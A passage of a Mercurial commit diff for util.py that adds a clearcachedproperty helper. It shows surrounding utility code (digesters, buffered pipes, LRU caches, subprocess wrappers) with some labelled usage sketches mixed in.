util: add util.clearcachedproperty...
Mark Thomas
r35021:be6aa0cf default
@@ -1,3861 +1,3866 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import itertools
30 30 import mmap
31 31 import os
32 32 import platform as pyplatform
33 33 import re as remod
34 34 import shutil
35 35 import signal
36 36 import socket
37 37 import stat
38 38 import string
39 39 import subprocess
40 40 import sys
41 41 import tempfile
42 42 import textwrap
43 43 import time
44 44 import traceback
45 45 import warnings
46 46 import zlib
47 47
48 48 from . import (
49 49 encoding,
50 50 error,
51 51 i18n,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 empty = pycompat.empty
66 66 httplib = pycompat.httplib
67 67 pickle = pycompat.pickle
68 68 queue = pycompat.queue
69 69 socketserver = pycompat.socketserver
70 70 stderr = pycompat.stderr
71 71 stdin = pycompat.stdin
72 72 stdout = pycompat.stdout
73 73 stringio = pycompat.stringio
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 httpserver = urllibcompat.httpserver
77 77 urlerr = urllibcompat.urlerr
78 78 urlreq = urllibcompat.urlreq
79 79
80 80 # workaround for win32mbcs
81 81 _filenamebytestr = pycompat.bytestr
82 82
83 83 def isatty(fp):
84 84 try:
85 85 return fp.isatty()
86 86 except AttributeError:
87 87 return False
88 88
89 89 # glibc determines buffering on the first write to stdout - if we replace a
90 90 # TTY-destined stdout with a pipe-destined stdout (e.g. a pager), we want line
91 91 # buffering
92 92 if isatty(stdout):
93 93 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
94 94
95 95 if pycompat.iswindows:
96 96 from . import windows as platform
97 97 stdout = platform.winstdout(stdout)
98 98 else:
99 99 from . import posix as platform
100 100
101 101 _ = i18n._
102 102
103 103 bindunixsocket = platform.bindunixsocket
104 104 cachestat = platform.cachestat
105 105 checkexec = platform.checkexec
106 106 checklink = platform.checklink
107 107 copymode = platform.copymode
108 108 executablepath = platform.executablepath
109 109 expandglobs = platform.expandglobs
110 110 explainexit = platform.explainexit
111 111 findexe = platform.findexe
112 112 gethgcmd = platform.gethgcmd
113 113 getuser = platform.getuser
114 114 getpid = os.getpid
115 115 groupmembers = platform.groupmembers
116 116 groupname = platform.groupname
117 117 hidewindow = platform.hidewindow
118 118 isexec = platform.isexec
119 119 isowner = platform.isowner
120 120 listdir = osutil.listdir
121 121 localpath = platform.localpath
122 122 lookupreg = platform.lookupreg
123 123 makedir = platform.makedir
124 124 nlinks = platform.nlinks
125 125 normpath = platform.normpath
126 126 normcase = platform.normcase
127 127 normcasespec = platform.normcasespec
128 128 normcasefallback = platform.normcasefallback
129 129 openhardlinks = platform.openhardlinks
130 130 oslink = platform.oslink
131 131 parsepatchoutput = platform.parsepatchoutput
132 132 pconvert = platform.pconvert
133 133 poll = platform.poll
134 134 popen = platform.popen
135 135 posixfile = platform.posixfile
136 136 quotecommand = platform.quotecommand
137 137 readpipe = platform.readpipe
138 138 rename = platform.rename
139 139 removedirs = platform.removedirs
140 140 samedevice = platform.samedevice
141 141 samefile = platform.samefile
142 142 samestat = platform.samestat
143 143 setbinary = platform.setbinary
144 144 setflags = platform.setflags
145 145 setsignalhandler = platform.setsignalhandler
146 146 shellquote = platform.shellquote
147 147 spawndetached = platform.spawndetached
148 148 split = platform.split
149 149 sshargs = platform.sshargs
150 150 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
151 151 statisexec = platform.statisexec
152 152 statislink = platform.statislink
153 153 testpid = platform.testpid
154 154 umask = platform.umask
155 155 unlink = platform.unlink
156 156 username = platform.username
157 157
158 158 try:
159 159 recvfds = osutil.recvfds
160 160 except AttributeError:
161 161 pass
162 162 try:
163 163 setprocname = osutil.setprocname
164 164 except AttributeError:
165 165 pass
166 166
167 167 # Python compatibility
168 168
169 169 _notset = object()
170 170
171 171 # disable Python's problematic floating point timestamps (issue4836)
172 172 # (Python hypocritically says you shouldn't change this behavior in
173 173 # libraries, and sure enough Mercurial is not a library.)
174 174 os.stat_float_times(False)
175 175
176 176 def safehasattr(thing, attr):
177 177 return getattr(thing, attr, _notset) is not _notset
178 178
179 179 def bytesinput(fin, fout, *args, **kwargs):
180 180 sin, sout = sys.stdin, sys.stdout
181 181 try:
182 182 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
183 183 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
184 184 finally:
185 185 sys.stdin, sys.stdout = sin, sout
186 186
187 187 def bitsfrom(container):
188 188 bits = 0
189 189 for bit in container:
190 190 bits |= bit
191 191 return bits
192 192
193 193 # Python 2.6 still has deprecation warnings enabled by default. We do not want
194 194 # to display anything to the standard user, so detect if we are running tests
195 195 # and only use Python deprecation warnings in that case.
196 196 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
197 197 if _dowarn:
198 198 # explicitly unfilter our warning for python 2.7
199 199 #
200 200 # The option of setting PYTHONWARNINGS in the test runner was investigated.
201 201 # However, module name set through PYTHONWARNINGS was exactly matched, so
202 202 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
203 203 # makes the whole PYTHONWARNINGS thing useless for our usecase.
204 204 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
205 205 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
206 206 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207 207
208 208 def nouideprecwarn(msg, version, stacklevel=1):
209 209 """Issue an python native deprecation warning
210 210
211 211 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
212 212 """
213 213 if _dowarn:
214 214 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
215 215 " update your code.)") % version
216 216 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217 217
218 218 DIGESTS = {
219 219 'md5': hashlib.md5,
220 220 'sha1': hashlib.sha1,
221 221 'sha512': hashlib.sha512,
222 222 }
223 223 # List of digest types from strongest to weakest
224 224 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
225 225
226 226 for k in DIGESTS_BY_STRENGTH:
227 227 assert k in DIGESTS
228 228
229 229 class digester(object):
230 230 """helper to compute digests.
231 231
232 232 This helper can be used to compute one or more digests given their name.
233 233
234 234 >>> d = digester([b'md5', b'sha1'])
235 235 >>> d.update(b'foo')
236 236 >>> [k for k in sorted(d)]
237 237 ['md5', 'sha1']
238 238 >>> d[b'md5']
239 239 'acbd18db4cc2f85cedef654fccc4a4d8'
240 240 >>> d[b'sha1']
241 241 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
242 242 >>> digester.preferred([b'md5', b'sha1'])
243 243 'sha1'
244 244 """
245 245
246 246 def __init__(self, digests, s=''):
247 247 self._hashes = {}
248 248 for k in digests:
249 249 if k not in DIGESTS:
250 250 raise Abort(_('unknown digest type: %s') % k)
251 251 self._hashes[k] = DIGESTS[k]()
252 252 if s:
253 253 self.update(s)
254 254
255 255 def update(self, data):
256 256 for h in self._hashes.values():
257 257 h.update(data)
258 258
259 259 def __getitem__(self, key):
260 260 if key not in DIGESTS:
261 261 raise Abort(_('unknown digest type: %s') % key)
262 262 return self._hashes[key].hexdigest()
263 263
264 264 def __iter__(self):
265 265 return iter(self._hashes)
266 266
267 267 @staticmethod
268 268 def preferred(supported):
269 269 """returns the strongest digest type in both supported and DIGESTS."""
270 270
271 271 for k in DIGESTS_BY_STRENGTH:
272 272 if k in supported:
273 273 return k
274 274 return None
275 275
276 276 class digestchecker(object):
277 277 """file handle wrapper that additionally checks content against a given
278 278 size and digests.
279 279
280 280 d = digestchecker(fh, size, {'md5': '...'})
281 281
282 282 When multiple digests are given, all of them are validated.
283 283 """
284 284
285 285 def __init__(self, fh, size, digests):
286 286 self._fh = fh
287 287 self._size = size
288 288 self._got = 0
289 289 self._digests = dict(digests)
290 290 self._digester = digester(self._digests.keys())
291 291
292 292 def read(self, length=-1):
293 293 content = self._fh.read(length)
294 294 self._digester.update(content)
295 295 self._got += len(content)
296 296 return content
297 297
298 298 def validate(self):
299 299 if self._size != self._got:
300 300 raise Abort(_('size mismatch: expected %d, got %d') %
301 301 (self._size, self._got))
302 302 for k, v in self._digests.items():
303 303 if v != self._digester[k]:
304 304 # i18n: first parameter is a digest name
305 305 raise Abort(_('%s mismatch: expected %s, got %s') %
306 306 (k, v, self._digester[k]))
307 307
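# Usage sketch (editor's illustration, not part of the diff): verifying
# streamed content against a known size and digest. The expected values
# below are for the literal payload b'foo' (md5 per the digester doctest).
import io
fh = io.BytesIO(b'foo')
checked = digestchecker(fh, 3,
                        {'md5': 'acbd18db4cc2f85cedef654fccc4a4d8'})
while checked.read(4096):
    pass                # drain the handle through the wrapping digester
checked.validate()      # raises Abort on a size or digest mismatch
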
308 308 try:
309 309 buffer = buffer
310 310 except NameError:
311 311 def buffer(sliceable, offset=0, length=None):
312 312 if length is not None:
313 313 return memoryview(sliceable)[offset:offset + length]
314 314 return memoryview(sliceable)[offset:]
315 315
316 316 closefds = pycompat.isposix
317 317
318 318 _chunksize = 4096
319 319
320 320 class bufferedinputpipe(object):
321 321 """a manually buffered input pipe
322 322
323 323 Python will not let us use buffered IO and lazy reading with 'polling' at
324 324 the same time. We cannot probe the buffer state and select will not detect
325 325 that data are ready to read if they are already buffered.
326 326
327 327 This class lets us work around that by implementing its own buffering
328 328 (allowing efficient readline) while offering a way to know if the buffer is
329 329 empty from the outside (allowing the buffer to cooperate with polling).
330 330
331 331 This class lives in the 'util' module because it makes use of the 'os'
332 332 module from the python stdlib.
333 333 """
334 334
335 335 def __init__(self, input):
336 336 self._input = input
337 337 self._buffer = []
338 338 self._eof = False
339 339 self._lenbuf = 0
340 340
341 341 @property
342 342 def hasbuffer(self):
343 343 """True is any data is currently buffered
344 344
345 345 This will be used externally a pre-step for polling IO. If there is
346 346 already data then no polling should be set in place."""
347 347 return bool(self._buffer)
348 348
349 349 @property
350 350 def closed(self):
351 351 return self._input.closed
352 352
353 353 def fileno(self):
354 354 return self._input.fileno()
355 355
356 356 def close(self):
357 357 return self._input.close()
358 358
359 359 def read(self, size):
360 360 while (not self._eof) and (self._lenbuf < size):
361 361 self._fillbuffer()
362 362 return self._frombuffer(size)
363 363
364 364 def readline(self, *args, **kwargs):
365 365 if 1 < len(self._buffer):
366 366 # this should not happen because both read and readline end with a
367 367 # _frombuffer call that collapses it.
368 368 self._buffer = [''.join(self._buffer)]
369 369 self._lenbuf = len(self._buffer[0])
370 370 lfi = -1
371 371 if self._buffer:
372 372 lfi = self._buffer[-1].find('\n')
373 373 while (not self._eof) and lfi < 0:
374 374 self._fillbuffer()
375 375 if self._buffer:
376 376 lfi = self._buffer[-1].find('\n')
377 377 size = lfi + 1
378 378 if lfi < 0: # end of file
379 379 size = self._lenbuf
380 380 elif 1 < len(self._buffer):
381 381 # we need to take previous chunks into account
382 382 size += self._lenbuf - len(self._buffer[-1])
383 383 return self._frombuffer(size)
384 384
385 385 def _frombuffer(self, size):
386 386 """return at most 'size' data from the buffer
387 387
388 388 The data are removed from the buffer."""
389 389 if size == 0 or not self._buffer:
390 390 return ''
391 391 buf = self._buffer[0]
392 392 if 1 < len(self._buffer):
393 393 buf = ''.join(self._buffer)
394 394
395 395 data = buf[:size]
396 396 buf = buf[len(data):]
397 397 if buf:
398 398 self._buffer = [buf]
399 399 self._lenbuf = len(buf)
400 400 else:
401 401 self._buffer = []
402 402 self._lenbuf = 0
403 403 return data
404 404
405 405 def _fillbuffer(self):
406 406 """read data to the buffer"""
407 407 data = os.read(self._input.fileno(), _chunksize)
408 408 if not data:
409 409 self._eof = True
410 410 else:
411 411 self._lenbuf += len(data)
412 412 self._buffer.append(data)
413 413
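# Usage sketch (editor's illustration, POSIX-only, 'proc' is an assumption):
# pairing bufferedinputpipe with select(), the scenario the class docstring
# describes.
import select, subprocess
proc = subprocess.Popen(['cat'], stdin=subprocess.PIPE,
                        stdout=subprocess.PIPE)
pipe = bufferedinputpipe(proc.stdout)
proc.stdin.write(b'ping\n')
proc.stdin.flush()
if not pipe.hasbuffer:             # only poll when nothing is buffered
    select.select([pipe], [], [])  # works: pipe exposes fileno()
line = pipe.readline()             # b'ping\n'
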
414 414 def mmapread(fp):
415 415 try:
416 416 fd = getattr(fp, 'fileno', lambda: fp)()
417 417 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
418 418 except ValueError:
419 419 # Empty files cannot be mmapped, but mmapread should still work. Check
420 420 # if the file is empty, and if so, return an empty buffer.
421 421 if os.fstat(fd).st_size == 0:
422 422 return ''
423 423 raise
424 424
425 425 def popen2(cmd, env=None, newlines=False):
426 426 # Setting bufsize to -1 lets the system decide the buffer size.
427 427 # The default for bufsize is 0, meaning unbuffered. This leads to
428 428 # poor performance on Mac OS X: http://bugs.python.org/issue4194
429 429 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
430 430 close_fds=closefds,
431 431 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 432 universal_newlines=newlines,
433 433 env=env)
434 434 return p.stdin, p.stdout
435 435
436 436 def popen3(cmd, env=None, newlines=False):
437 437 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
438 438 return stdin, stdout, stderr
439 439
440 440 def popen4(cmd, env=None, newlines=False, bufsize=-1):
441 441 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
442 442 close_fds=closefds,
443 443 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
444 444 stderr=subprocess.PIPE,
445 445 universal_newlines=newlines,
446 446 env=env)
447 447 return p.stdin, p.stdout, p.stderr, p
448 448
449 449 def version():
450 450 """Return version information if available."""
451 451 try:
452 452 from . import __version__
453 453 return __version__.version
454 454 except ImportError:
455 455 return 'unknown'
456 456
457 457 def versiontuple(v=None, n=4):
458 458 """Parses a Mercurial version string into an N-tuple.
459 459
460 460 The version string to be parsed is specified with the ``v`` argument.
461 461 If it isn't defined, the current Mercurial version string will be parsed.
462 462
463 463 ``n`` can be 2, 3, or 4. Here is how some version strings map to
464 464 returned values:
465 465
466 466 >>> v = b'3.6.1+190-df9b73d2d444'
467 467 >>> versiontuple(v, 2)
468 468 (3, 6)
469 469 >>> versiontuple(v, 3)
470 470 (3, 6, 1)
471 471 >>> versiontuple(v, 4)
472 472 (3, 6, 1, '190-df9b73d2d444')
473 473
474 474 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
475 475 (3, 6, 1, '190-df9b73d2d444+20151118')
476 476
477 477 >>> v = b'3.6'
478 478 >>> versiontuple(v, 2)
479 479 (3, 6)
480 480 >>> versiontuple(v, 3)
481 481 (3, 6, None)
482 482 >>> versiontuple(v, 4)
483 483 (3, 6, None, None)
484 484
485 485 >>> v = b'3.9-rc'
486 486 >>> versiontuple(v, 2)
487 487 (3, 9)
488 488 >>> versiontuple(v, 3)
489 489 (3, 9, None)
490 490 >>> versiontuple(v, 4)
491 491 (3, 9, None, 'rc')
492 492
493 493 >>> v = b'3.9-rc+2-02a8fea4289b'
494 494 >>> versiontuple(v, 2)
495 495 (3, 9)
496 496 >>> versiontuple(v, 3)
497 497 (3, 9, None)
498 498 >>> versiontuple(v, 4)
499 499 (3, 9, None, 'rc+2-02a8fea4289b')
500 500 """
501 501 if not v:
502 502 v = version()
503 503 parts = remod.split('[\+-]', v, 1)
504 504 if len(parts) == 1:
505 505 vparts, extra = parts[0], None
506 506 else:
507 507 vparts, extra = parts
508 508
509 509 vints = []
510 510 for i in vparts.split('.'):
511 511 try:
512 512 vints.append(int(i))
513 513 except ValueError:
514 514 break
515 515 # (3, 6) -> (3, 6, None)
516 516 while len(vints) < 3:
517 517 vints.append(None)
518 518
519 519 if n == 2:
520 520 return (vints[0], vints[1])
521 521 if n == 3:
522 522 return (vints[0], vints[1], vints[2])
523 523 if n == 4:
524 524 return (vints[0], vints[1], vints[2], extra)
525 525
526 526 # used by parsedate
527 527 defaultdateformats = (
528 528 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
529 529 '%Y-%m-%dT%H:%M', # without seconds
530 530 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
531 531 '%Y-%m-%dT%H%M', # without seconds
532 532 '%Y-%m-%d %H:%M:%S', # our common legal variant
533 533 '%Y-%m-%d %H:%M', # without seconds
534 534 '%Y-%m-%d %H%M%S', # without :
535 535 '%Y-%m-%d %H%M', # without seconds
536 536 '%Y-%m-%d %I:%M:%S%p',
537 537 '%Y-%m-%d %H:%M',
538 538 '%Y-%m-%d %I:%M%p',
539 539 '%Y-%m-%d',
540 540 '%m-%d',
541 541 '%m/%d',
542 542 '%m/%d/%y',
543 543 '%m/%d/%Y',
544 544 '%a %b %d %H:%M:%S %Y',
545 545 '%a %b %d %I:%M:%S%p %Y',
546 546 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
547 547 '%b %d %H:%M:%S %Y',
548 548 '%b %d %I:%M:%S%p %Y',
549 549 '%b %d %H:%M:%S',
550 550 '%b %d %I:%M:%S%p',
551 551 '%b %d %H:%M',
552 552 '%b %d %I:%M%p',
553 553 '%b %d %Y',
554 554 '%b %d',
555 555 '%H:%M:%S',
556 556 '%I:%M:%S%p',
557 557 '%H:%M',
558 558 '%I:%M%p',
559 559 )
560 560
561 561 extendeddateformats = defaultdateformats + (
562 562 "%Y",
563 563 "%Y-%m",
564 564 "%b",
565 565 "%b %Y",
566 566 )
567 567
568 568 def cachefunc(func):
569 569 '''cache the result of function calls'''
570 570 # XXX doesn't handle keyword args
571 571 if func.__code__.co_argcount == 0:
572 572 cache = []
573 573 def f():
574 574 if len(cache) == 0:
575 575 cache.append(func())
576 576 return cache[0]
577 577 return f
578 578 cache = {}
579 579 if func.__code__.co_argcount == 1:
580 580 # we gain a small amount of time because
581 581 # we don't need to pack/unpack the list
582 582 def f(arg):
583 583 if arg not in cache:
584 584 cache[arg] = func(arg)
585 585 return cache[arg]
586 586 else:
587 587 def f(*args):
588 588 if args not in cache:
589 589 cache[args] = func(*args)
590 590 return cache[args]
591 591
592 592 return f
593 593
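# Usage sketch (editor's illustration): memoizing a one-argument function
# with cachefunc; keyword arguments are not supported, per the XXX above.
def square(x):
    print('computing', x)
    return x * x
square = cachefunc(square)
square(3)   # prints once, returns 9
square(3)   # cache hit: returns 9 without recomputing
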
594 594 class cow(object):
595 595 """helper class to make copy-on-write easier
596 596
597 597 Call preparewrite before doing any writes.
598 598 """
599 599
600 600 def preparewrite(self):
601 601 """call this before writes, return self or a copied new object"""
602 602 if getattr(self, '_copied', 0):
603 603 self._copied -= 1
604 604 return self.__class__(self)
605 605 return self
606 606
607 607 def copy(self):
608 608 """always do a cheap copy"""
609 609 self._copied = getattr(self, '_copied', 0) + 1
610 610 return self
611 611
612 612 class sortdict(collections.OrderedDict):
613 613 '''a simple dictionary ordered by insertion (re-setting a key moves it last)
614 614
615 615 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
616 616 >>> d2 = d1.copy()
617 617 >>> d2
618 618 sortdict([('a', 0), ('b', 1)])
619 619 >>> d2.update([(b'a', 2)])
620 620 >>> list(d2.keys()) # should still be in last-set order
621 621 ['b', 'a']
622 622 '''
623 623
624 624 def __setitem__(self, key, value):
625 625 if key in self:
626 626 del self[key]
627 627 super(sortdict, self).__setitem__(key, value)
628 628
629 629 if pycompat.ispypy:
630 630 # __setitem__() isn't called as of PyPy 5.8.0
631 631 def update(self, src):
632 632 if isinstance(src, dict):
633 633 src = src.iteritems()
634 634 for k, v in src:
635 635 self[k] = v
636 636
637 637 class cowdict(cow, dict):
638 638 """copy-on-write dict
639 639
640 640 Be sure to call d = d.preparewrite() before writing to d.
641 641
642 642 >>> a = cowdict()
643 643 >>> a is a.preparewrite()
644 644 True
645 645 >>> b = a.copy()
646 646 >>> b is a
647 647 True
648 648 >>> c = b.copy()
649 649 >>> c is a
650 650 True
651 651 >>> a = a.preparewrite()
652 652 >>> b is a
653 653 False
654 654 >>> a is a.preparewrite()
655 655 True
656 656 >>> c = c.preparewrite()
657 657 >>> b is c
658 658 False
659 659 >>> b is b.preparewrite()
660 660 True
661 661 """
662 662
663 663 class cowsortdict(cow, sortdict):
664 664 """copy-on-write sortdict
665 665
666 666 Be sure to call d = d.preparewrite() before writing to d.
667 667 """
668 668
669 669 class transactional(object):
670 670 """Base class for making a transactional type into a context manager."""
671 671 __metaclass__ = abc.ABCMeta
672 672
673 673 @abc.abstractmethod
674 674 def close(self):
675 675 """Successfully closes the transaction."""
676 676
677 677 @abc.abstractmethod
678 678 def release(self):
679 679 """Marks the end of the transaction.
680 680
681 681 If the transaction has not been closed, it will be aborted.
682 682 """
683 683
684 684 def __enter__(self):
685 685 return self
686 686
687 687 def __exit__(self, exc_type, exc_val, exc_tb):
688 688 try:
689 689 if exc_type is None:
690 690 self.close()
691 691 finally:
692 692 self.release()
693 693
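# Sketch of the contract (editor's illustration; 'demotransaction' is a
# hypothetical subclass): on a clean exit from the with-block close() runs
# first; release() always runs and should abort if close() was never reached.
class demotransaction(transactional):
    def __init__(self):
        self._closed = False
    def close(self):
        self._closed = True
    def release(self):
        if not self._closed:
            print('aborting')

with demotransaction():
    pass   # close(), then release()
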
694 694 @contextlib.contextmanager
695 695 def acceptintervention(tr=None):
696 696 """A context manager that closes the transaction on InterventionRequired
697 697
698 698 If no transaction was provided, this simply runs the body and returns
699 699 """
700 700 if not tr:
701 701 yield
702 702 return
703 703 try:
704 704 yield
705 705 tr.close()
706 706 except error.InterventionRequired:
707 707 tr.close()
708 708 raise
709 709 finally:
710 710 tr.release()
711 711
712 712 @contextlib.contextmanager
713 713 def nullcontextmanager():
714 714 yield
715 715
716 716 class _lrucachenode(object):
717 717 """A node in a doubly linked list.
718 718
719 719 Holds a reference to nodes on either side as well as a key-value
720 720 pair for the dictionary entry.
721 721 """
722 722 __slots__ = (u'next', u'prev', u'key', u'value')
723 723
724 724 def __init__(self):
725 725 self.next = None
726 726 self.prev = None
727 727
728 728 self.key = _notset
729 729 self.value = None
730 730
731 731 def markempty(self):
732 732 """Mark the node as emptied."""
733 733 self.key = _notset
734 734
735 735 class lrucachedict(object):
736 736 """Dict that caches most recent accesses and sets.
737 737
738 738 The dict consists of an actual backing dict - indexed by original
739 739 key - and a doubly linked circular list defining the order of entries in
740 740 the cache.
741 741
742 742 The head node is the newest entry in the cache. If the cache is full,
743 743 we recycle head.prev and make it the new head. Cache accesses result in
744 744 the node being moved to before the existing head and being marked as the
745 745 new head node.
746 746 """
747 747 def __init__(self, max):
748 748 self._cache = {}
749 749
750 750 self._head = head = _lrucachenode()
751 751 head.prev = head
752 752 head.next = head
753 753 self._size = 1
754 754 self._capacity = max
755 755
756 756 def __len__(self):
757 757 return len(self._cache)
758 758
759 759 def __contains__(self, k):
760 760 return k in self._cache
761 761
762 762 def __iter__(self):
763 763 # We don't have to iterate in cache order, but why not.
764 764 n = self._head
765 765 for i in range(len(self._cache)):
766 766 yield n.key
767 767 n = n.next
768 768
769 769 def __getitem__(self, k):
770 770 node = self._cache[k]
771 771 self._movetohead(node)
772 772 return node.value
773 773
774 774 def __setitem__(self, k, v):
775 775 node = self._cache.get(k)
776 776 # Replace existing value and mark as newest.
777 777 if node is not None:
778 778 node.value = v
779 779 self._movetohead(node)
780 780 return
781 781
782 782 if self._size < self._capacity:
783 783 node = self._addcapacity()
784 784 else:
785 785 # Grab the last/oldest item.
786 786 node = self._head.prev
787 787
788 788 # At capacity. Kill the old entry.
789 789 if node.key is not _notset:
790 790 del self._cache[node.key]
791 791
792 792 node.key = k
793 793 node.value = v
794 794 self._cache[k] = node
795 795 # And mark it as newest entry. No need to adjust order since it
796 796 # is already self._head.prev.
797 797 self._head = node
798 798
799 799 def __delitem__(self, k):
800 800 node = self._cache.pop(k)
801 801 node.markempty()
802 802
803 803 # Temporarily mark as newest item before re-adjusting head to make
804 804 # this node the oldest item.
805 805 self._movetohead(node)
806 806 self._head = node.next
807 807
808 808 # Additional dict methods.
809 809
810 810 def get(self, k, default=None):
811 811 try:
812 812 return self._cache[k].value
813 813 except KeyError:
814 814 return default
815 815
816 816 def clear(self):
817 817 n = self._head
818 818 while n.key is not _notset:
819 819 n.markempty()
820 820 n = n.next
821 821
822 822 self._cache.clear()
823 823
824 824 def copy(self):
825 825 result = lrucachedict(self._capacity)
826 826 n = self._head.prev
827 827 # Iterate in oldest-to-newest order, so the copy has the right ordering
828 828 for i in range(len(self._cache)):
829 829 result[n.key] = n.value
830 830 n = n.prev
831 831 return result
832 832
833 833 def _movetohead(self, node):
834 834 """Mark a node as the newest, making it the new head.
835 835
836 836 When a node is accessed, it becomes the freshest entry in the LRU
837 837 list, which is denoted by self._head.
838 838
839 839 Visually, let's make ``N`` the new head node (* denotes head):
840 840
841 841 previous/oldest <-> head <-> next/next newest
842 842
843 843 ----<->--- A* ---<->-----
844 844 | |
845 845 E <-> D <-> N <-> C <-> B
846 846
847 847 To:
848 848
849 849 ----<->--- N* ---<->-----
850 850 | |
851 851 E <-> D <-> C <-> B <-> A
852 852
853 853 This requires the following moves:
854 854
855 855 C.next = D (node.prev.next = node.next)
856 856 D.prev = C (node.next.prev = node.prev)
857 857 E.next = N (head.prev.next = node)
858 858 N.prev = E (node.prev = head.prev)
859 859 N.next = A (node.next = head)
860 860 A.prev = N (head.prev = node)
861 861 """
862 862 head = self._head
863 863 # C.next = D
864 864 node.prev.next = node.next
865 865 # D.prev = C
866 866 node.next.prev = node.prev
867 867 # N.prev = E
868 868 node.prev = head.prev
869 869 # N.next = A
870 870 # It is tempting to do just "head" here, however if node is
871 871 # adjacent to head, this will do bad things.
872 872 node.next = head.prev.next
873 873 # E.next = N
874 874 node.next.prev = node
875 875 # A.prev = N
876 876 node.prev.next = node
877 877
878 878 self._head = node
879 879
880 880 def _addcapacity(self):
881 881 """Add a node to the circular linked list.
882 882
883 883 The new node is inserted before the head node.
884 884 """
885 885 head = self._head
886 886 node = _lrucachenode()
887 887 head.prev.next = node
888 888 node.prev = head.prev
889 889 node.next = head
890 890 head.prev = node
891 891 self._size += 1
892 892 return node
893 893
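# Usage sketch (editor's illustration): a two-entry lrucachedict evicts
# the least recently used key when at capacity.
d = lrucachedict(2)
d['a'] = 1
d['b'] = 2
d['a']        # touching 'a' makes 'b' the oldest entry
d['c'] = 3    # at capacity: the 'b' node is recycled
'b' in d      # False; 'a' and 'c' remain
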
894 894 def lrucachefunc(func):
895 895 '''cache most recent results of function calls'''
896 896 cache = {}
897 897 order = collections.deque()
898 898 if func.__code__.co_argcount == 1:
899 899 def f(arg):
900 900 if arg not in cache:
901 901 if len(cache) > 20:
902 902 del cache[order.popleft()]
903 903 cache[arg] = func(arg)
904 904 else:
905 905 order.remove(arg)
906 906 order.append(arg)
907 907 return cache[arg]
908 908 else:
909 909 def f(*args):
910 910 if args not in cache:
911 911 if len(cache) > 20:
912 912 del cache[order.popleft()]
913 913 cache[args] = func(*args)
914 914 else:
915 915 order.remove(args)
916 916 order.append(args)
917 917 return cache[args]
918 918
919 919 return f
920 920
921 921 class propertycache(object):
922 922 def __init__(self, func):
923 923 self.func = func
924 924 self.name = func.__name__
925 925 def __get__(self, obj, type=None):
926 926 result = self.func(obj)
927 927 self.cachevalue(obj, result)
928 928 return result
929 929
930 930 def cachevalue(self, obj, value):
931 931 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
932 932 obj.__dict__[self.name] = value
933 933
934 def clearcachedproperty(obj, prop):
935 '''clear a cached property value, if one has been set'''
936 if prop in obj.__dict__:
937 del obj.__dict__[prop]
938
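# Usage sketch (editor's illustration; 'demo' is a hypothetical class):
# pairing propertycache with the new clearcachedproperty helper this
# commit adds.
class demo(object):
    @propertycache
    def answer(self):
        print('computing')
        return 42
d = demo()
d.answer                          # prints once; value cached in __dict__
clearcachedproperty(d, 'answer')  # drops the cached value, if present
d.answer                          # recomputed on the next access
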
934 939 def pipefilter(s, cmd):
935 940 '''filter string S through command CMD, returning its output'''
936 941 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
937 942 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
938 943 pout, perr = p.communicate(s)
939 944 return pout
940 945
941 946 def tempfilter(s, cmd):
942 947 '''filter string S through a pair of temporary files with CMD.
943 948 CMD is used as a template to create the real command to be run,
944 949 with the strings INFILE and OUTFILE replaced by the real names of
945 950 the temporary files generated.'''
946 951 inname, outname = None, None
947 952 try:
948 953 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
949 954 fp = os.fdopen(infd, pycompat.sysstr('wb'))
950 955 fp.write(s)
951 956 fp.close()
952 957 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
953 958 os.close(outfd)
954 959 cmd = cmd.replace('INFILE', inname)
955 960 cmd = cmd.replace('OUTFILE', outname)
956 961 code = os.system(cmd)
